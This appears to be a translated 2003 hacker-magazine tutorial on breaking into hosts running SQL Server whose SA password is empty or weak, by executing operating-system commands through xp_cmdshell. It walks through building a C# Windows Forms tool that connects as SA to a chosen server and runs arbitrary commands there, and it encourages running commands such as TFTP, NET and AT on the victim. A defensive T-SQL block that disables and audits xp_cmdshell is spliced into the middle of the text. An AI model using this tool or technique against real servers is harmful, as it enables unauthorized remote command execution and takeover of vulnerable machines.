Using VC# to easily build a SQL-cmdshell
(Author: mikespook | Published: 2003-10-7 | Views: 354)
Keywords: C#, database, extended stored procedure, vulnerability

This article was submitted to Hacker Security Base. Please do not reprint it without permission from Hacker Security Base. Thank you for your cooperation!

Do you want to break into a machine? Want administrator privileges on the system? Want any computer at your fingertips? What would you do: brute-force the administrator password with a scanner, or use a remote overflow? If these operating-system-level intrusion techniques no longer whet your appetite, why not try something else? Don't leave, there is a window open! Sometimes we don't have to stare at the operating system's passwords, because the passwords of other services the system provides are easier to get at. When you run your various scanners, have you seen systems that provide SQL Server? Have you seen a scanner report that the SQL Server SA account has an empty or weak password? If so, have you ever used that weakness to get into the host? Let's take a look at what we can do with SA permissions on a SQL Server.

With SA permission on SQL Server we can execute the extended stored procedure xp_cmdshell. Logging in with SA in Query Analyzer, any statement we like can be run through xp_cmdshell to do whatever we intend. For example, suppose we have obtained the SA password "123456" of a computer named "M-S". We start SQL Query Analyzer (this tool ships with the SQL Server client), fill in the computer name, user name and password, and press OK to log in to SQL Server, as shown in Figure 1.

[Figure 1: Query Analyzer login dialog]

Let's first look at the contents of this computer's C drive root directory. Enter xp_cmdshell "dir c:\" in Query Analyzer, and the result shown in Figure 2 appears.

[Figure 2: result of xp_cmdshell "dir c:\"]

Did everyone see it? The result of this statement is the listing of this computer's C drive root directory.
You may say: what can I do with a directory listing? Then change the command to TFTP, NET, AT ... Aren't these the commands you dream of executing on the computer you want to break into? And we never scanned for the operating system's Administrator password at all, because an intrusion through SQL Server does not require the operating system's administrator privilege. However, using SQL Query Analyzer is inconvenient: to install it you must install the SQL Server client, and the installation steps and caveats alone are enough to put you off. Since we already understand the principle, why not write a tool ourselves? Below we use the SQL Server connection classes in the .NET System.Data.SqlClient namespace to write a SQL-cmdshell in VC#.

Does writing a SQL-cmdshell in VC# sound daunting? We have to connect to the SQL database and also execute an extended stored procedure. Don't worry! The .NET class library does so much for us that the code we have to write by hand comes to less than 40 lines. Below I describe the specific way to write it. Of course, by my habit, we first build the interface we need (Figure 3).

[Figure 3: SQL-cmdshell main form]

Create a new Windows Application project in VC# named SQLCMD. In the description below, the contents in parentheses are the control properties that need to be changed; properties not mentioned keep their default values.
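The weakness the article relies on is that a sysadmin login (here SA) can reach the operating system through xp_cmdshell. The T-SQL below is an added defensive example, not part of the original article or its tool: it checks whether xp_cmdshell is enabled, turns it off, and records every batch or RPC call that mentions it, with the login, client host and application that sent it. It assumes SQL Server 2012 or later (sp_configure 'xp_cmdshell' and Extended Events do not exist on the SQL Server 2000 the article targets); the session name and .xel path are placeholders chosen for this example.

```sql
-- 1. Is xp_cmdshell enabled?  value_in_use = 1 means any sysadmin login,
--    such as an SA account with a weak password, can run OS commands.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = N'xp_cmdshell';

-- 2. Disable it. 'show advanced options' must be on to touch this setting.
EXEC sp_configure N'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure N'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure N'show advanced options', 0;
RECONFIGURE;

-- 3. Capture every batch or RPC whose text mentions xp_cmdshell.
--    Session name and file path are placeholders for this example.
IF EXISTS (SELECT 1 FROM sys.server_event_sessions WHERE name = N'xp_cmdshell_watch')
    DROP EVENT SESSION [xp_cmdshell_watch] ON SERVER;

CREATE EVENT SESSION [xp_cmdshell_watch] ON SERVER
ADD EVENT sqlserver.sql_batch_completed (
    ACTION (sqlserver.server_principal_name, sqlserver.client_hostname,
            sqlserver.client_app_name, sqlserver.sql_text)
    WHERE sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_cmdshell%')
),
ADD EVENT sqlserver.rpc_completed (
    ACTION (sqlserver.server_principal_name, sqlserver.client_hostname,
            sqlserver.client_app_name, sqlserver.sql_text)
    WHERE sqlserver.like_i_sql_unicode_string(sqlserver.sql_text, N'%xp_cmdshell%')
)
ADD TARGET package0.event_file (SET filename = N'C:\xe\xp_cmdshell_watch.xel')
WITH (STARTUP_STATE = ON);

ALTER EVENT SESSION [xp_cmdshell_watch] ON SERVER STATE = START;

-- 4. Read what was captured: who called xp_cmdshell, from where, with what text.
SELECT
    CAST(event_data AS xml).value('(event/@timestamp)[1]', 'datetime2') AS event_time,
    CAST(event_data AS xml).value('(event/action[@name="server_principal_name"]/value)[1]', 'nvarchar(128)') AS login_name,
    CAST(event_data AS xml).value('(event/action[@name="client_hostname"]/value)[1]', 'nvarchar(128)') AS client_host,
    CAST(event_data AS xml).value('(event/action[@name="sql_text"]/value)[1]', 'nvarchar(max)') AS sql_text
FROM sys.fn_xe_file_target_read_file(N'C:\xe\xp_cmdshell_watch*.xel', NULL, NULL, NULL);
```

Disabling xp_cmdshell is not a substitute for fixing the SA password: any sysadmin login can simply run sp_configure to turn it back on, which is exactly why step 3 records the attempt.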
Add a group box (Name: GroupBox1, Text: SQL Server) to the form (Name: frmMain, Text: SQL-cmdshell). In GroupBox1 add three labels (Name: Label1, Text: SQL Server; Name: Label2, Text: User Name; Name: Label3, Text: Password) and three text boxes (Name: txtServer; Name: txtID, Text: SA; Name: txtPassword, PasswordChar: *). Also add a check box (Name: cbNULLPassword, Text: Empty password) to the group box. On the form frmMain add a list box (Name: lbResult, HorizontalScrollBar: True, TabStop: False), a label (Name: Label4, Text: Command), a combo box (Name: cbCmd) and a button (Name: btnCmd, Text: Execute). Finally add a status bar (Name: StatusBar1) and put two panels on it (Name: SBP, Text: Status, Width: 40; Name: sbpMsg). For the sake of appearance you can also adjust the Anchor property of the controls.

Also add two non-visual data controls, which are found under the "Data" tab of the Toolbox: a SqlConnection (Name: SqlConn) and a SqlCommand (Name: SqlComm, Connection: SqlConn). With the interface in place, the rest is coding.

In the CheckedChanged event of the check box cbNULLPassword add the following code:

    private void cbNULLPassword_CheckedChanged(object sender, System.EventArgs e)
    {
        // When "Empty password" is checked, the password box is disabled.
        txtPassword.Enabled = !cbNULLPassword.Checked;
    }

This way, when "Empty password" is selected, the password box becomes unavailable. A reader may ask: isn't this redundant? When SA has an empty password, can't we just leave the password box blank? That works, of course, but it is not tidy enough; I will explain later why I added this check box.

In the KeyPress event of the combo box cbCmd add the following code:

    private void cbCmd_KeyPress(object sender, System.Windows.Forms.KeyPressEventArgs e)
    {
        // In a WinForms KeyPress event the Enter key arrives as '\r' (character 13).
        if ('\r' == e.KeyChar)
            btnCmd_Click(sender, e);
    }

When the combo box has focus, pressing Enter is now equivalent to clicking the button btnCmd. Ok, let's write the core part. For convenience, I have put line numbers in front of the code.
    // Requires: using System.Data.SqlClient; (for SqlDataReader)
    10  private void btnCmd_Click(object sender, System.EventArgs e)
    20  {
    30      try
    40      {
    50          sbpMsg.Text = "Command '" + cbCmd.Text + "' is executing...";
    60          this.Cursor = Cursors.WaitCursor;
    70          string pw = null;
    80          if (!cbNULLPassword.Checked)
    90              pw = "password=" + txtPassword.Text + ";";
                // The server name goes in "data source"; "workstation id" only names the client.
    100         SqlConn.ConnectionString = "initial catalog=master;" + pw
                    + "persist security info=" + (!cbNULLPassword.Checked).ToString()
                    + ";user id=" + txtID.Text + ";data source=" + txtServer.Text
                    + ";packet size=4096";
    110         SqlComm.CommandText = "xp_cmdshell 'cmd /c " + cbCmd.Text + "'";
    120         SqlComm.Connection.Open();
    130         lbResult.Items.Add("★★★★★[" + cbCmd.Text + "]★★★★★");
    140         SqlDataReader reader = SqlComm.ExecuteReader();
    150         while (reader.Read())
    160         {
    170             if (!reader.IsDBNull(0))
    180                 lbResult.Items.Add(reader.GetString(0));
    190         }
    200         sbpMsg.Text = "Command '" + cbCmd.Text + "' executed successfully!";
    210         SqlComm.Connection.Close();
    220         lbResult.Items.Add("★★★★★[" + cbCmd.Text + "]★★★★★");
    230         lbResult.Items.Add("");
    240         if (!cbCmd.Items.Contains(cbCmd.Text))
    250             cbCmd.Items.Insert(0, cbCmd.Text);
    260         cbCmd.Text = null;
    270         lbResult.SelectedIndex = lbResult.Items.Count - 1;
    280         this.Cursor = Cursors.Default;
    290     }
    300     catch (Exception ex)
    310     {
    320         this.Cursor = Cursors.Default;
    330         sbpMsg.Text = ex.Message;
    340     }
    350 }

Let me explain the code above. Line 50 shows in the status bar that the current command is running. If the program throws an exception anywhere during execution, line 300 catches it, and line 330 shows the reason for the exception in the status bar. Since some commands may run for a long time, line 60 turns the mouse cursor into the waiting style, and line 280 restores the normal cursor after the command completes.